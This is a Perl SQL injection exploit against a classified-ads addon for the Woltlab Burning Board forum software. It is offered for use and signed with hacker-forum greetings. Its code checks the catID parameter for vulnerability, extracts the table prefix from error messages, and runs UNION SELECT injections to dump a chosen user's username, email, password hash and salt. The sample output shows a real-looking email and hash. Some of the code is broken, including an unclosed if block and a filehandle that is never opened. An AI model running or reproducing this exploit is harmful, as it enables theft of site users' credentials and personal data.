#!/usr/bin/perl -w
# Woltlab Burningboard Addon Kleinanzeigenmarkt SQL Injection Exploit
# Exploit by fred777 (full np stuff <3)
# Greez to all teh l33t sh1t like :
# * Core.am
# * Back2hack.cc
# * Free-hack.com
# * fred777.de
# Usage: exploit.pl <page> <userid>
# Example: perl exploit.pl http://seite.de 1
# Demonstration:
# perl exploit.pl http://seite.de 1
# ...
# >-------Exploit Intro-------<
# -----------------------------
# Logging:
# -----------------------------
# [*] Vulnerable: Yes
# [*] Injecting..
# [*] -----------
# [*] Prefix: wcf1_
# [*] mySQL Version: 5.0
# [*] -----------
# [*] Userid: 1
# [*] Username: fred777
# [*] Email: nebelfrost77@googlemail.com
# [*] Hash: fc4520d254498762e8c576917ee452dbebd83367
# [*] Salt: ab520eaa88d03b1d3440277c8fba78bfb1994af2
# [*] Exit
# Setting crappy vars
use LWP::Simple;
if (!$ARGV[1]) {&intro; exit;}
my $link = shift;
my $userid = shift;
my $add = '/index.php?page=AnnounceShow&catID=';
print "\nLOGGING:\n----------------------------------------\n";
#*********** Vulnerable-Check ************#
$resp = get($link.$add."'");
if($resp =~ m/Fatal Error/i) {
print "[*] Vulnerable: Yes\n[*] Injecting..\n[*] --------------\n";
elsif($resp =~ m/SecuritySystem/i) {print "[*] Blocked by SecuritySystem\n[*] Exit\n\n"; exit;}
elsif($resp =~ m/id="errorMessage">/i) {print "[*] You must be a member\n[*] Exit\n\n"; exit;}
else { print "[*] Vulnerable: No\n[*] Exit"; exit;}
#************* Prefix Check ***************#
$resp =~ m/AS wieviele FROM (.*_)attachment/i;
$prefix = $1;
print "[*] Prefix: ".$prefix."\n";
#*********** Injecting Nanobots ***********#
$infostring = 'concat_ws(0x3a,999999,version(),username,email,password)';
$resp2 = get($link.$add."1+and+1=0+GROUP+BY+b.messageID)+union+(select+1,1,1,".$infostring.",1"x38 ."+from+".$prefix."user+where+userid=".$userid.")--");
$resp2 =~ m/999999:(.*)<\/a>/i;
#*********** Converting and printing ******#
@data = split(":",$1);
print "[*] mySQL Version: ".substr($data[0],0,3)."\n[*] --------------\n";
print "[*] Userid: ".$userid."\n[*] Username: ".$data[1]."\n[*] Email: ".$data[2]."\n";
print "[*] Hash: ".$data[3]."\n";
#************* Salt Check ***************#
print "[*] Salt: ";
$resp3 = get($link.$add."1+and+1=0+GROUP+BY+b.messageID)+union+(select+1,1,1,concat(999999,0x3a,salt)".",1"x38 ."+from+".$prefix."user+where+userid=".$userid.")--");
if($resp3 =~ m/Fatal Error/i) {print "Keinen\n\n\n"; exit;}
$resp3 =~ m/999999:(.*)<\/a>/i;
$salt = $1;
print $salt;
#*********** Write2file *****************#
$text = "[fred777] WBB Kleinanzeigenmarkt Exploit:\n\n[*] Link: ".$link.$add."\n".
"[*] Prefix: ".$prefix."\n[*] mySQL Version: ".$data[0]."\n[*] Userid: ".$userid."\n".
"[*] Username: ".$data[1]."\n[*] Email: ".$data[2]."\n[*] Hash: ".$data[3]."\n[*] Salt: ".$salt."\n\n\n";
print LULZ $text;
close LULZ;
print "\n[*] Writing Logfile";
print "\n[*] Exit\n\n\n";
sub intro {
print q {
* [WBB] Kleinanzeigenmarkt Exploit
* written by fred777
* -----------
* Usage: exploit.pl <url> <userid>